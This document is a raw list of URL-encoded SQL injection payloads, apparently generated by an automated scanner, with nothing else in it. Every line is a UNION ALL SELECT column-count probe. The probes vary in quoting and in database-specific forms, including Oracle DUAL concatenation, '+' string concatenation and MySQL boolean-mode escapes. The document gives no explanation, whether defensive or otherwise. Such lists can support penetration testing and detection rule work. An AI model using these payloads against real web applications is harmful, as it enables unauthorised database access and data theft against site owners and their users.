foo%27%20WHERE%209257%3D9257%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%20WHERE%204374%3D4374%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%20WHERE%202620%3D2620%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%20WHERE%206655%3D6655%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%20WHERE%202690%3D2690%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%20WHERE%206851%3D6851%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%20WHERE%208760%3D8760%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%20WHERE%201416%3D1416%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%20WHERE%204051%3D4051%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%20WHERE%204274%3D4274%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%20WHERE%203724%3D3724%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%20WHERE%203918%3D3918%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%20WHERE%203220%3D3220%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%20WHERE%204181%3D4181%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%20WHERE%204793%3D4793%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%20WHERE%202065%3D2065%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%20WHERE%209697%3D9697%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%20WHERE%202030%3D2030%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%20WHERE%207384%3D7384%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%20WHERE%206118%3D6118%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%20WHERE%206068%3D6068%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%20WHERE%203050%3D3050%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%20WHERE%209468%3D9468%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%20WHERE%205729%3D5729%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%20WHERE%204250%3D4250%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%20WHERE%208184%3D8184%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%20WHERE%203043%3D3043%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%20WHERE%202514%3D2514%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%20WHERE%201662%3D1662%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%7C%7C%28SELECT%20%27VCjK%27%20FROM%20DUAL%20WHERE%202029%3D2029%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%7C%7C%28SELECT%20%27iqui%27%20FROM%20DUAL%20WHERE%201151%3D1151%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%7C%7C%28SELECT%20%27AgWD%27%20FROM%20DUAL%20WHERE%206012%3D6012%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%7C%7C%28SELECT%20%27sxWG%27%20FROM%20DUAL%20WHERE%204741%3D4741%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%7C%7C%28SELECT%20%27ECpr%27%20FROM%20DUAL%20WHERE%206210%3D6210%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%7C%7C%28SELECT%20%27ePMA%27%20FROM%20DUAL%20WHERE%209034%3D9034%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%7C%7C%28SELECT%20%27QBTQ%27%20FROM%20DUAL%20WHERE%208367%3D8367%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%7C%7C%28SELECT%20%27jLET%27%20FROM%20DUAL%20WHERE%202626%3D2626%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%7C%7C%28SELECT%20%27mmna%27%20FROM%20DUAL%20WHERE%207905%3D7905%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%7C%7C%28SELECT%20%27KuLr%27%20FROM%20DUAL%20WHERE%202425%3D2425%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%7C%7C%28SELECT%20%27sWMN%27%20WHERE%201763%3D1763%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%7C%7C%28SELECT%20%27rtUy%27%20WHERE%207916%3D7916%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%7C%7C%28SELECT%20%27MBKn%27%20WHERE%208097%3D8097%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%7C%7C%28SELECT%20%27jtZn%27%20WHERE%206991%3D6991%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%7C%7C%28SELECT%20%27VjmX%27%20WHERE%202751%3D2751%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%7C%7C%28SELECT%20%27dPmE%27%20WHERE%208790%3D8790%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%7C%7C%28SELECT%20%27mPQg%27%20WHERE%204552%3D4552%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%7C%7C%28SELECT%20%27raRh%27%20WHERE%205247%3D5247%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%7C%7C%28SELECT%20%27wTMp%27%20WHERE%209763%3D9763%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%7C%7C%28SELECT%20%27LRns%27%20WHERE%201991%3D1991%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%2B%28SELECT%20ctcT%20WHERE%205026%3D5026%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%2B%28SELECT%20wHMQ%20WHERE%201312%3D1312%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%2B%28SELECT%20sHMX%20WHERE%208475%3D8475%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%2B%28SELECT%20wNBj%20WHERE%201310%3D1310%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%2B%28SELECT%20RoeJ%20WHERE%204832%3D4832%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%2B%28SELECT%20qlwj%20WHERE%206888%3D6888%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%2B%28SELECT%20LbGL%20WHERE%205602%3D5602%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%2B%28SELECT%20IOvc%20WHERE%204596%3D4596%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%2B%28SELECT%20ovMn%20WHERE%206086%3D6086%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%2B%28SELECT%20VRsm%20WHERE%201006%3D1006%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%2B%28SELECT%20%27LIrn%27%20WHERE%207012%3D7012%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%2B%28SELECT%20%27NKRs%27%20WHERE%206439%3D6439%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%2B%28SELECT%20%27LpQF%27%20WHERE%201832%3D1832%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%2B%28SELECT%20%27BZhe%27%20WHERE%208850%3D8850%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%2B%28SELECT%20%27gBrE%27%20WHERE%203130%3D3130%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%2B%28SELECT%20%27tOHp%27%20WHERE%203340%3D3340%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%2B%28SELECT%20%27dXOs%27%20WHERE%201791%3D1791%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%2B%28SELECT%20%27oXVL%27%20WHERE%207304%3D7304%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%2B%28SELECT%20%27SkeF%27%20WHERE%202641%3D2641%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%2B%28SELECT%20%27bwEL%27%20WHERE%205540%3D5540%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 -1010%29%20UNION%20ALL%20SELECT%207772%2C7772%2C7772%2C7772%2C7772%2C7772%2C7772%2C7772%2C7772%2C7772%2C7772--%20 -1372%29%20UNION%20ALL%20SELECT%207399%2C7399%2C7399%2C7399%2C7399%2C7399%2C7399%2C7399%2C7399%2C7399%2C7399%2C7399--%20 -3334%29%20UNION%20ALL%20SELECT%202706%2C2706%2C2706%2C2706%2C2706%2C2706%2C2706%2C2706%2C2706%2C2706%2C2706%2C2706%2C2706--%20 -2733%29%20UNION%20ALL%20SELECT%205109%2C5109%2C5109%2C5109%2C5109%2C5109%2C5109%2C5109%2C5109%2C5109%2C5109%2C5109%2C5109%2C5109--%20 -3797%29%20UNION%20ALL%20SELECT%203870%2C3870%2C3870%2C3870%2C3870%2C3870%2C3870%2C3870%2C3870%2C3870%2C3870%2C3870%2C3870%2C3870%2C3870--%20 -2500%29%20UNION%20ALL%20SELECT%203868%2C3868%2C3868%2C3868%2C3868%2C3868%2C3868%2C3868%2C3868%2C3868%2C3868%2C3868%2C3868%2C3868%2C3868%2C3868--%20 -5451%29%20UNION%20ALL%20SELECT%202205%2C2205%2C2205%2C2205%2C2205%2C2205%2C2205%2C2205%2C2205%2C2205%2C2205%2C2205%2C2205%2C2205%2C2205%2C2205%2C2205--%20 -2355%29%20UNION%20ALL%20SELECT%201550%2C1550%2C1550%2C1550%2C1550%2C1550%2C1550%2C1550%2C1550%2C1550%2C1550%2C1550%2C1550%2C1550%2C1550%2C1550%2C1550%2C1550--%20 -5488%29%20UNION%20ALL%20SELECT%208849%2C8849%2C8849%2C8849%2C8849%2C8849%2C8849%2C8849%2C8849%2C8849%2C8849%2C8849%2C8849%2C8849%2C8849%2C8849%2C8849%2C8849%2C8849--%20 -6865%29%20UNION%20ALL%20SELECT%203551%2C3551%2C3551%2C3551%2C3551%2C3551%2C3551%2C3551%2C3551%2C3551%2C3551%2C3551%2C3551%2C3551%2C3551%2C3551%2C3551%2C3551%2C3551%2C3551--%20 -7790%27%29%20UNION%20ALL%20SELECT%209014%2C9014%2C9014%2C9014%2C9014%2C9014%2C9014%2C9014%2C9014%2C9014%2C9014--%20 -4829%27%29%20UNION%20ALL%20SELECT%202881%2C2881%2C2881%2C2881%2C2881%2C2881%2C2881%2C2881%2C2881%2C2881%2C2881%2C2881--%20 -9638%27%29%20UNION%20ALL%20SELECT%205751%2C5751%2C5751%2C5751%2C5751%2C5751%2C5751%2C5751%2C5751%2C5751%2C5751%2C5751%2C5751--%20 -2908%27%29%20UNION%20ALL%20SELECT%201124%2C1124%2C1124%2C1124%2C1124%2C1124%2C1124%2C1124%2C1124%2C1124%2C1124%2C1124%2C1124%2C1124--%20 -5811%27%29%20UNION%20ALL%20SELECT%205958%2C5958%2C5958%2C5958%2C5958%2C5958%2C5958%2C5958%2C5958%2C5958%2C5958%2C5958%2C5958%2C5958%2C5958--%20 -1162%27%29%20UNION%20ALL%20SELECT%206399%2C6399%2C6399%2C6399%2C6399%2C6399%2C6399%2C6399%2C6399%2C6399%2C6399%2C6399%2C6399%2C6399%2C6399%2C6399--%20 -8857%27%29%20UNION%20ALL%20SELECT%204083%2C4083%2C4083%2C4083%2C4083%2C4083%2C4083%2C4083%2C4083%2C4083%2C4083%2C4083%2C4083%2C4083%2C4083%2C4083%2C4083--%20 -9062%27%29%20UNION%20ALL%20SELECT%206670%2C6670%2C6670%2C6670%2C6670%2C6670%2C6670%2C6670%2C6670%2C6670%2C6670%2C6670%2C6670%2C6670%2C6670%2C6670%2C6670%2C6670--%20 -1127%27%29%20UNION%20ALL%20SELECT%208854%2C8854%2C8854%2C8854%2C8854%2C8854%2C8854%2C8854%2C8854%2C8854%2C8854%2C8854%2C8854%2C8854%2C8854%2C8854%2C8854%2C8854%2C8854--%20 -8193%27%29%20UNION%20ALL%20SELECT%209492%2C9492%2C9492%2C9492%2C9492%2C9492%2C9492%2C9492%2C9492%2C9492%2C9492%2C9492%2C9492%2C9492%2C9492%2C9492%2C9492%2C9492%2C9492%2C9492--%20 -9648%27%20UNION%20ALL%20SELECT%209418%2C9418%2C9418%2C9418%2C9418%2C9418%2C9418%2C9418%2C9418%2C9418%2C9418--%20 -8307%27%20UNION%20ALL%20SELECT%202352%2C2352%2C2352%2C2352%2C2352%2C2352%2C2352%2C2352%2C2352%2C2352%2C2352%2C2352--%20 -5695%27%20UNION%20ALL%20SELECT%202650%2C2650%2C2650%2C2650%2C2650%2C2650%2C2650%2C2650%2C2650%2C2650%2C2650%2C2650%2C2650--%20 -5856%27%20UNION%20ALL%20SELECT%207462%2C7462%2C7462%2C7462%2C7462%2C7462%2C7462%2C7462%2C7462%2C7462%2C7462%2C7462%2C7462%2C7462--%20 -1728%27%20UNION%20ALL%20SELECT%207134%2C7134%2C7134%2C7134%2C7134%2C7134%2C7134%2C7134%2C7134%2C7134%2C7134%2C7134%2C7134%2C7134%2C7134--%20 -6035%27%20UNION%20ALL%20SELECT%205977%2C5977%2C5977%2C5977%2C5977%2C5977%2C5977%2C5977%2C5977%2C5977%2C5977%2C5977%2C5977%2C5977%2C5977%2C5977--%20 -5424%27%20UNION%20ALL%20SELECT%204391%2C4391%2C4391%2C4391%2C4391%2C4391%2C4391%2C4391%2C4391%2C4391%2C4391%2C4391%2C4391%2C4391%2C4391%2C4391%2C4391--%20 -4439%27%20UNION%20ALL%20SELECT%207524%2C7524%2C7524%2C7524%2C7524%2C7524%2C7524%2C7524%2C7524%2C7524%2C7524%2C7524%2C7524%2C7524%2C7524%2C7524%2C7524%2C7524--%20 -4200%27%20UNION%20ALL%20SELECT%202365%2C2365%2C2365%2C2365%2C2365%2C2365%2C2365%2C2365%2C2365%2C2365%2C2365%2C2365%2C2365%2C2365%2C2365%2C2365%2C2365%2C2365%2C2365--%20 -4120%27%20UNION%20ALL%20SELECT%209492%2C9492%2C9492%2C9492%2C9492%2C9492%2C9492%2C9492%2C9492%2C9492%2C9492%2C9492%2C9492%2C9492%2C9492%2C9492%2C9492%2C9492%2C9492%2C9492--%20 -7569%22%20UNION%20ALL%20SELECT%201279%2C1279%2C1279%2C1279%2C1279%2C1279%2C1279%2C1279%2C1279%2C1279%2C1279--%20 -7760%22%20UNION%20ALL%20SELECT%205050%2C5050%2C5050%2C5050%2C5050%2C5050%2C5050%2C5050%2C5050%2C5050%2C5050%2C5050--%20 -6982%22%20UNION%20ALL%20SELECT%208270%2C8270%2C8270%2C8270%2C8270%2C8270%2C8270%2C8270%2C8270%2C8270%2C8270%2C8270%2C8270--%20 -8025%22%20UNION%20ALL%20SELECT%205737%2C5737%2C5737%2C5737%2C5737%2C5737%2C5737%2C5737%2C5737%2C5737%2C5737%2C5737%2C5737%2C5737--%20 -6605%22%20UNION%20ALL%20SELECT%209678%2C9678%2C9678%2C9678%2C9678%2C9678%2C9678%2C9678%2C9678%2C9678%2C9678%2C9678%2C9678%2C9678%2C9678--%20 -7899%22%20UNION%20ALL%20SELECT%208590%2C8590%2C8590%2C8590%2C8590%2C8590%2C8590%2C8590%2C8590%2C8590%2C8590%2C8590%2C8590%2C8590%2C8590%2C8590--%20 -3045%22%20UNION%20ALL%20SELECT%202595%2C2595%2C2595%2C2595%2C2595%2C2595%2C2595%2C2595%2C2595%2C2595%2C2595%2C2595%2C2595%2C2595%2C2595%2C2595%2C2595--%20 